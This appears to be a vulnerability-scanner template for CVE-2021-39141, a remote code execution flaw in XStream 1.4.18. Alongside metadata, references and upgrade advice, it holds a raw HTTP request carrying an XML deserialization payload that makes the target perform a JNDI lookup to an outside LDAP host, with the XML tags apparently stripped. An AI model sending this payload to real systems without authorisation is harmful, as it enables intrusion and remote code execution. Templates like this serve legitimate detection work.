id: CVE-2021-39141 info: name: XStream 1.4.18 - Remote Code Execution author: pwnhxl severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: | Upgrade XStream to a version that is not affected by CVE-2021-39141. reference: - http://x-stream.github.io/CVE-2021-39141.html - https://x-stream.github.io/CVE-2021-39141.html - https://github.com/x-stream/xstream/security/advisories/GHSA-g5w6-mrj7-75h2 - https://security.netapp.com/advisory/ntap-20210923-0003/ - https://nvd.nist.gov/vuln/detail/CVE-2021-39141 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 8.5 cve-id: CVE-2021-39141 cwe-id: CWE-434 epss-score: 0.1966 epss-percentile: 0.9578 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream tags: cve,cve2021,xstream,deserialization,rce http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml

2 3

java.lang.Comparable false java.lang.Comparable compareTo

java.lang.Object

0 PLAIN

false

int hash java.lang.String

false

hash

java.lang.String javax.naming.InitialContext doLookup

java.lang.String

serialPersistentFields [Ljava.io.ObjectStreamField; serialPersistentFields java.lang.String CASE_INSENSITIVE_ORDER java.util.Comparator CASE_INSENSITIVE_ORDER java.lang.String serialVersionUID long serialVersionUID java.lang.String value [C value java.lang.String hash int serialPersistentFields [Ljava.io.ObjectStreamField; CASE_INSENSITIVE_ORDER java.util.Comparator serialVersionUID long value [C hash false java.lang.String

java.lang.Object false false false false false

ldap://{{interactsh-url}}/#evil

matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - "timestamp" - "com.thoughtworks.xstream" condition: or - type: word part: header words: - "application/json" - type: status status: - 500 # digest: 4b0a00483046022100bb719417e137b1d3c894c0f3921b906accb4e02a6144c545a6f5493f42889411022100e8b8cbcf516a631e9debf3ffefa0bf06b654a8cd2c6ea67b4bdd9b79c872218b:922c64590222798bb761d5b6d8e72950